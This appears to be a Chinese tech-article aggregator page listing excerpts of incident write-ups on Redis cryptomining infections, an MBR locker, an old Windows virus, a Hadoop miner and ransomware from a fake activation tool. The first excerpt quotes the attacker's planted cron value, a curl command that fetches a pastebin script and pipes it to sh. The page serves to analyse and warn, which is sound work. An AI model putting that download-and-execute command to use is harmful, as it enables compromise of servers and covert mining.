原文:記一次redis病毒分析筆記

起因 偶然間發現redis里有一個陌生key:tightsoft,它的值是: root curl fsSL https: pastebin.com raw xbY p Tb sh 看key名就知道這肯定不是我們存的,再看value我警覺了,這是要定時執行腳本啊。 分析 於是我便開始逐層撥開它的面紗,腳本的內容是來源於https: pastebin.com raw xbY p Tb,把它下載到本地后 ...

2018-09-05 15:13 2 944 推薦指數:

查看詳情

一次MBR鎖機病毒分析

有一天,在機緣巧合之下我獲得了一個鎖機軟件(是多巧合阿喂!),然后興高采烈的把它拖入了虛擬機里蹂躪(>_<!)。 很巧,軟件有虛擬機檢測。。。 Emmmm好吧,隨便 ...

Fri Dec 08 02:17:00 CST 2017 0 1081
一次病毒分析之旅

0x00 前言 這個病毒應該是比較簡單的,別人給我的樣本,讓我幫忙看看,看樣子是很早的一個病毒,針對Windows XP系統的,行為分析很簡單,但是想着不能就僅僅分析關鍵點,要不就把整個結構給逆向出來,弄了兩天,搞的差不多了,簡單的記錄一下。 0x01 基本介紹 整個病毒是4個文件組成 ...

Tue Jan 05 04:58:00 CST 2016 17 4101
一次Linux服務器因redis漏洞的挖礦病毒入侵

中毒原因,redis bind 0.0.0.0 而且沒有密碼,和安全意識太薄弱。 所以,redis一定要設密碼,改端口,不要用root用戶啟動,如果業務沒有需要,不要bind 0.0.0.0!!!!!!!!!!! 這個病毒能都橫向傳播,不要以為在外網redis的端口不通就沒有事情。只要內網 ...

Sun Apr 14 01:28:00 CST 2019 0 1889
一次利用redis橫向移動挖礦分析

該木馬使用Linux系統的shell腳本編寫Downloader,使用curl與wget命令發起網絡請求下載木馬的其他組件,雖然代碼可被輕易分析,但是編寫成本和門檻降低,這也是當前惡意代碼使用腳本語言編寫的一個趨勢。 攻擊者通過RCE執行可疑腳本 1.挖礦流程分析圖 2.下面分析挖礦程序 ...

Tue Jan 26 01:20:00 CST 2021 0 704
一次部署Hadoop后遭受kthreaddi挖礦病毒

雲服務器在部署Hadoop后便被黑了,查看進程發現了kthreaddi占滿了CPU。 kill掉這個進程后還會自己重啟,猜測是設置了定時啟動任務。 查看定時器,查看定時器中的文件,發現文件不存在 ...

Sat May 08 23:59:00 CST 2021 0 1526
一次親身體驗的勒索病毒事件 StopV2勒索病毒

昨天給筆記本裝了 windows server 2016 操作系統,配置的差不多之后,想使用注冊機激活系統。使用了幾個本地以前下載的注冊機激活失敗后,嘗試上網搜索。 於是找到下面這個網站(這個網站下載的注冊機是勒索病毒,千萬不要在這里下載) 下載的注冊機運行后,電腦自帶 ...

Thu Feb 27 07:32:00 CST 2020 2 5370
記錄一次清理Redis 病毒程序 kdevtmpfsi

首先貼上情況 一個redis 程序占用cpu 46%,雖然redis-server 有定時清理過期的鍵,但也不會占用這么高的CPU吧,一般都是0.3% 看看這個進程什么鬼 然后找到了它的父親進程 在 /var/tmp/kinsing 刪除 ...

Sun Dec 29 22:59:00 CST 2019 0 1974
一次Redis錯誤排查經歷

日志集中式監控平台上線已經有一段時間,但是大部分情況下只是作為發布或者出問題時查看日志的便利工具使用。平時大家都不怎么主動上去看看。於是前幾天把應用的錯誤日志也加上郵件、Hi和短信報警,馬上就收到很多錯誤報警,引起了大家的重視。其中有一個Redis報錯: 看起來挺嚴重的,拿不到Redis連接 ...

Sat Mar 18 06:56:00 CST 2017 0 2790
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM